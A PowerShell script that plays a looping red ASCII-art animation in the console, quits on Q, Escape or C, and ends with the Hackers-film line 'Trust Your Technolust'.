" # # # # # .,,,.....,,,,. ::,::, ,r.::i: # # ;MMMMMMMMMMMMMMMMM, X27ii7 MM.::2M. # # 0MMMMMMMMMMWWWWMMM. ;7..;; 2M. .,2X # # :.;;ii: 2B88ZZWMM ,, ... .X ,,r .MZ . :Z # # 7BZZZZ80X.7MM7 :X7MB 7X8X2 iX..2X.,. MZ ..,X # # 8MMMMMMMWZZZZZZB2. 8MMi. MM :r,:.X8 ,7.,:;i;;, ..,,,i # # :M@BBBB0008Z0880B@M8, ,@7 8M r: X7 rS ;r.,,::,;XZ; .,,. # # MB8888ZWMMX7B0BBBMMS .. XM ;..B;. rr,X.,,Xi ,i27B0..:7 # # 2@8ZZZZ8MMW : 0Mi ,M. i.:M88, X7;.,,i, MM .,2X # # @B88ZZaWMMX ;SaaSX: 8M,; M0.,,.:rX:. X0i..;X MM .,.a. # # ;M088ZaaMMMMMMMMMMBXM ,. BM,.:7:,:i7,.0S..S0 ;M. ..X; # # XM08ZZa8MMM88080BWMM 7;.;@;;;2 :7.aS:i:r. @B,7iri # # 7MB8ZZa0MMBZZ888ZMMMMM. . . ,.:.,. # # ,W@B8ZaZ08Z88080M@8Ba # # ;ZBBBBBBWWB80X # # # # # # # "
|
||||
" # # # # # .2ZZZ0B0ZZaaZZaSSXX . # # :MMMMMMMMMMMMMMMMMM: SMMMMr7rrSMMMM2:r0. # # rM@M@@@@@MMW0000B@M7 2MMMM..:,aMMMMZ ,8X # # BMZZZ80@M: . MMMM. ,,.MMMMM .:S # # .,, iMBZZZ80@M8i;;rMMMr7iSMMMX;;iMMMM. ;;MMMMM ,,X # # ;MMMMMMMW80BZZZ80B@W; ;MMM ,iMMMM SMMM . ,,X. # # MMBBB0008ZZBBZ8880BWM@; XZ .rMMM2 X aMM .., ;X. ,:: # # 0@08888ZZ0 MMWBBWB8WMM . MMM. ,M8 MM .;rMMMMM.,7 # # :@8ZZZZZZW :MMW :Ma WM@ 7MM: Mr ,,iMMMMM .7X # # ZW88Z888B0 ,::,.WMMr. :MMM ZMX . SW..X:MMMMM .:X # # BW888880MS BMMMMB88BM7XMMM ;M: :i0MMW, 0:,; ;MMMMX,iX # # B@88880BM, MMZZZZ8B@2 r8M;.,B7ii .7Z@X.X:, i;,:: # # Z@08880WW 2MBaZ8800BMX: # # r@B8880BWMMBZ88880WMMM # # 8@WBBB088800WWW@r # # .SZB08880ZZ7;, # # # # # "
|
||||
" # # # .... # # 7MMMMMMMMMMMMMMMMMMWWWr # # .MMMMMMMMMMM@@@MMMMMMMa WMMMMMWX72ZWBr;: # # .MMMMMM@@MMM@WWBBBBB@MZ MMMMMM@i;MMMM27Z # # MMMMMM880B@Mi WMMMMMM.,WMMMZ,2 # # :;;;: 8MBWMMW800BMM8r2MMM02MMMW:iZMMS 2MMMZ,S. # # rMMMMMMM@8ZZZZ8B880BWMW;.7MMX.BMM2 .MMX , .iX # # MMMMMMB008888ZZZ88800B@M2 .8;.2MMr 7 7M7 ::rZ;ir # # MMMMMWZ8888888@MM@88880MMi. : XMM,.M2 M0.iMMMMrr, # # SMMMMMa888888BX .2M@WW@MX ,aW iM@ iMB r@,,@MMM;;X # # MMMMM8Z88888BS BMMMMMB:.rMM..MZ., :, 0r,MMMMXir # # ;MMMMMZ888880WMMM@000B0@SMMM, M2.ZMMM7SX:78WMZ;X # # ZMMMMWZ88800BBMMMZaZ8BWZ8BMS,22::i:X:. # # 0MMMMWZ88008ZBMMWZ800B2:. # # ZMMMMWZ8888ZZWMM88800@MMi # # :MMMMM88088ZZ0080BWM2 # # i8@MMM@@WWWWW@W8S; # # ,;X2XXXi. # # # "
|
||||
" # # # ::,:rrrrXZ2SSSri. # # XMMMMMMMMMMMMMMMMMMMMX # # MMMMMMMMMMMM@MMMMMMMZ WW000MMMSrSr # # ;W8ZZW@MMMM@@@@@@W@MM MMMMMMMMZMMMX # # MMMMMMMMMMB@Ma MMMMMMMMXWM@X # # ir;i.WM@@@WWWWMWWMMSaM8ZMZaM2ZMWr # # MMMMMMMWWWW0000BBB@MZ:Wa;MS:MZ;72r # # aMMMMMM@@@@B0BBBBBBWWMS7XSMS;0Z;Z0; # # ZMM@@@@@@@@0BBBB@MWBBM@;;2MXBaZSMMX # # :MM@@@@@@@@0BBBBWM@WWM27ZXM7BSZSMMS # # MMM@@@@@MMW0BBBBWW@MMX2MXW7XS2aMMa # # 8MM@@@@@@M@0BBBB@@WW@B@MSBaMMXX7Si # # MMM@@@@@MMBBBB0WMB0WBZ@XX: # # ZMMMM@@MMM@0BB0BMW0WB: # # MMMMMMMMMMB0BB0MMBB@MZ # # MMMMMMMMMM0BBBBWB@M # # MMMMMMMMMMWWWWMMW: # # ;rSaZWWMMMMM@Zi # # # "
|
||||
" # # # ZZ222228BBBBWZ # # ,MMMMMMMMMMMMMM # # MMMMMMMMMMMMMMi # # 2BMMMMMMMMMMMMS # # MM@@@@@@@@MMX # # 2MM@W@@@@W@MMX # # aMMWBBBBBBBBWMX # # 2MWBBBBBBBBBBMX # # SMM@@@@@@@@@MMX # # SMM@@@@@@@@@MM7 # # SMM@@@@@@@@@MM7 # # SMM@@@@@@@@@MM7 # # :MM@@@@@@@@@MM. # # .MM@@@@@@@@@MM. # # MM@@@@@@@@@MM. # # MMMMMMMMMMMMM. # # 8MMMMMMMMMMMM # # iMMMMMMMMMMMM # # # "
|
||||
" # # # .;Xa22aaa2rrrrr;, # # BMMMMMMMMMMMMMMMMMMM2 # # .7r2@M@0000BXWMMMMMMMMMMMMMMMMMMM # # ZMMMMMMMMMMMMMM@MMMMM@MMMM@0ZZZBS # # 2MM8MMMMMMMMMWW@MM@@@@@@M0 # # 7MMZMBB@8@BZ@WW@WWWW@WWWM0,irr # # 7BZa@aZW2W2Z@WWWWBBWWWWW@MMMMMM; # # rM8aWa8@aZZ@WWWWWWWWWWW@MMMMMMMM # # aMMZ0B8@a2BMWWMMWWWW@@@@@@@@MMMM # # 8M@ZZB8W88a@WWM@WWWWW@@@@@@@@@MZ # # 0MM00ZZWB@2WWWBWWWWWW@@@@@@@@@M; # # ,XS8MMW@WMW@W@@WWWWW@@@@@@@@@MM # # ,S00B@WW@WWWWWM@MM@@@@@MZ # # :0MW@@WWWW@M@@@@@@@MM # # MM@W@@WWWWM@@@@MMM@MX # # WM@@WWWWMMMMMMMMMM@ # # WMMM@@MMMMMMMMMM@ # # ;BMMMMMMMWW8aar # # . # "
|
||||
" # # # ..... # # XM@MMMMMMMMMMMMMMMMMMMS # # ;rZB22SS@MMMMWWX ZMMMMMMMMMMMMMMMMMMMMM, # # MaMMMMZXMMMMMMMS ZM@WWWWWW@WWMMM@MM@@@MX # # :87MMMMXi@MMMMMM ,M@B00BMMMMMM; # # ,ar@MM@iXMMZ7XMMMBZMMMW20M@B000WM@WWWMr:iiii. # # .2;:,:r;XMMi..@MMSrMM077BMB0000B8ZZ880MMMMMMMM2 # # S7SZrri7M2:S,8MMXiZXi2M@B00008888800BWBMMMMMMM. # # rS8MMM2:SM:ZM,XMM;iii;MM00000BMMW0000000BM@MMMM # # 2X8MMM7:8a:BMi;MM:2@ri7M@@W@@Mi ZB0000080M@@MMM # # S7WMMMS;0rrri;iMW,8M0:i8MMMMMMr 8W00000ZWM@@@Mi # # X70WZ8XS82MMMaiWBi0MM2BBBBBB@MMMB0000000MM@@MB # # ,;.:,;aSrWM0ZW08888MMMW0000000MMMMMM # # i,XW0008WMMB8000000MMM@MM # # MMMWB000MMW8000008MMMMMM # # iMMWB0000000000MMMMM0 # # ,20MM@@W@@@MMMMMW2 # # :rSZ882Xr. # # # "
|
||||
" # # # # # .. . Xa2ZZZZZZBWBBBBB0Z2 # # 2SrSMMMWWX7S2MMMMB BMMMMMMMMMMMMMMMMMM. # # .MX:XMMMMM;:i;MMMMM ,MMWBBBB0@MMMMMMMMMM: # # iS:,8MMMM@.i rMMMM; .. WMB000ZWMZ # # ;X:.8MMMMMi,iMMMMiXrWMMM07rWMMM7XraMM088888MM, .,., # # :ri. ,i,,MMM; :.SMMMM,:XMMZ:.i8@008888008BMMMMMMMM: # # ri,.Xr ::: WM7 iX MMMW..iZ. ;0MW0880088BBBBBBBBWWBMM # # rr,8MMMM@;:,,M8 MM aMMZ . .8MM8Z0WWWMMB ZB0000008M@ # # .Zi.8MMMMM.:.XM XMM. ,MMX :Ma . 2MMM BB888888aM: # # iX: 8MMMMW7,:B7 .. .. WMi XMMS .:0MM0 ,. 7M088888Z@B # # ;XriMMMM@;ri;8,7MMMWr: ZM: SMMMX8W800@MMMMX MB88888ZBM # # . . :,,7,20X;,.r:2Zi:0MZr,WB8Z800WMM B@08888ZWM # # ;ZWB088888MMX;M088880MB # # ZMMMB008080MM@W00880WW7 # # WM@WW08800000BWWS # # :iXZB00WWWWB8r # # # # # "
|
||||
" # # # # # .,.,.i :,..,. :,iiiiiiiiii;:,.. # # MS:irMMX i7i;7BM MMMMMMMMMMMMMMMMMB # # rZ,. rMM, .7,, MM SM@BBBBW@MMMMMMMMM # # S:.. BMM :i, MX .. ...aM0ZZ880r ., # # X,,, BM@ ..,Z,..MB :XZXXZ ;S;r ,Za::0BZZZZZ0. . # # i::. ,;i:i,. MB .S,,.,M ,i,i.X8r ;08ZZZZ80WMMMMMMMB. # # .::. ;27:::.,. WM i.,Z ZX ;i.iZX :MM0888800BB0000BBBM2 # # r:,:WMMr:.,X:,. MW . BS. iB ;:.:. :XM@0000B2 0MBZZ8888Mr # # XS,,,MMB ;., ,M7 ZMXr B. ;.:S;:. .. MMZZZZZZ8W # # S.,. MMS ,a,. Z0 i:;,. XS ; 7, Si ;7;77X; WMW2ZZZZZWr # # ,7., :MM ;0,.,B. X7, ,ri,.@2i.; XaM@MMMMM,rMM2ZZZZZBZ # # ,7i7.0Bi iii::Z,;8 rii@Z:;X.: ZMB0000BS MMZaZZZZB8 # # MMWM@8ZZZZ0ZMM02ZZZZBZ # # Z@S,@088Z88WW8ZZZ8BB7 # # rBBBWWWB0BWWW0S # # .:,..,,: # # # # # "
|
||||
)
|
||||
|
||||
|
||||
$counter = 0
|
||||
$maxCounter = $frames.Count
|
||||
$host.UI.RawUI.BackgroundColor = "Black"
|
||||
$host.UI.RawUI.ForegroundColor = "Red"
|
||||
1..4 | % {
|
||||
try
|
||||
{
|
||||
$host.UI.RawUI.WindowSize = New-Object System.Management.Automation.Host.Size 72,30
|
||||
}
|
||||
catch {}
|
||||
}
|
||||
|
||||
try
|
||||
{
|
||||
Clear-Host
|
||||
|
||||
$host.UI.RawUI.CursorPosition = New-Object System.Management.Automation.Host.Coordinates `
|
||||
0,([Console]::WindowHeight - 1)
|
||||
Write-Host -NoNewLine 'Press Q to Quit'
|
||||
|
||||
## Loop through the frames and display them
|
||||
[Console]::TreatControlCAsInput = $true
|
||||
while($true)
|
||||
{
|
||||
if([Console]::KeyAvailable)
|
||||
{
|
||||
$key = [Console]::ReadKey()
|
||||
if(($key.Key -eq 'Escape') -or
|
||||
($key.Key -eq 'Q') -or
|
||||
($key.Key -eq 'C'))
|
||||
{
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
$host.UI.RawUI.CursorPosition = New-Object System.Management.Automation.Host.Coordinates 0,0
|
||||
Write-Host (($frames[$counter] -split "`t") -join "`r`n")
|
||||
Start-Sleep -m 150
|
||||
$counter = ($counter + 1) % $maxCounter
|
||||
}
|
||||
}
|
||||
finally
|
||||
{
|
||||
## Clean up, display exit screen
|
||||
Clear-Host
|
||||
$frames[0] -split "`t"
|
||||
"`n"
|
||||
" Trust Your Technolust"
|
||||
"`n`n`n"
|
||||
}
|
Loading…
Reference in New Issue